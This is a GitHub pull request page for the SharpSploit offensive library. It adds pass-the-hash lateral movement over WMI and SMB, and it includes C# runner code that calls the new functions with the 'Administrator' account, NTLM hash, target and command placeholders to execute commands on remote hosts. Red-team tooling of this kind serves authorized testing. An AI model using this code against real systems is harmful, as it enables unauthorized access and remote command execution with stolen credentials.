Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Merge pth into master #44

Open
wants to merge 8 commits into
base: dev
Choose a base branch
from
Open

Merge pth into master #44

wants to merge 8 commits into from

Conversation

checkymander
Copy link
Collaborator

Added pass the hash functionality into SharpSploit, WMIExecute and SMBExecute based on the Invoke-TheHash codebase. Code can be tested with the following runner:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;

using SharpSploit.LateralMovement;

namespace SSRunner
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("Testing Pass the Hash with WMIExec");
            Console.WriteLine(PassTheHash.WMIExecute("Administrator", "<hash>", "<domain>", "<target>", command: "", debug:false, AdminCheck:false));


            Console.WriteLine("Testing Pass the Hash with SMBExec SMB2");
            Console.WriteLine(PassTheHash.SMBExecute("Administrator", "<hash>", "<domain>", "<target>", command: "<command>", ComSpec: false, ForceSMB1: false, debug:true, AdminCheck:false)); ;


            Console.WriteLine("Testing Pass the Hash with SMBExec SMB1");
            Console.WriteLine(PassTheHash.SMBExecute("Administrator", "<hash>", "<domain>", "<target>")); ;

            Console.WriteLine("Finished");
            Console.ReadKey();
        }
    }
}

The library supports both Admin Check functionality, and command execution with support for WMI, SMB1, and SMB2 (including signing).

@cobbr cobbr changed the base branch from master to dev April 18, 2020 23:38
checkymander added 3 commits August 2, 2020 20:50
added a fix for pth not working against localhost
5b3f128
Combined WMI pth modules into the LateralMovement.WMI namespace, crea…
ae2fc3a 
…ted a dedicated LateralMovement.SMB namespace, adding pth modules into there. Renamed modules to avoid clashing with the existing modules in those namespaces.
Merge remote-tracking branch 'origin/dev' into pth
c2502a3
@checkymander
Copy link
Collaborator Author 

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;

using SharpSploit.LateralMovement;

namespace SSRunner
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("Testing Pass the Hash with WMIExec");
            Console.WriteLine(WMI.WMIExecuteWithHash("Administrator", "<hash>", "<domain>", "<target>", command: "", debug:false, AdminCheck:false));


            Console.WriteLine("Testing Pass the Hash with SMBExec SMB2");
            Console.WriteLine(SMB.SMBExecuteWithHash("Administrator", "<hash>", "<domain>", "<target>", command: "<command>", ComSpec: false, ForceSMB1: false, debug:true, AdminCheck:false)); ;


            Console.WriteLine("Testing Pass the Hash with SMBExec SMB1");
            Console.WriteLine(SMB.SMBExecuteWithHash("Administrator", "<hash>", "<domain>", "<target>")); ;

            Console.WriteLine("Finished");
            Console.ReadKey();
        }
    }
}

Updated example code to reference the new function names

@edermi
Copy link

edermi commented Apr 7, 2021

Any chance to get this merged into master? Would love to see this in Covenant in the long run

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
2 participants
@checkymander @edermi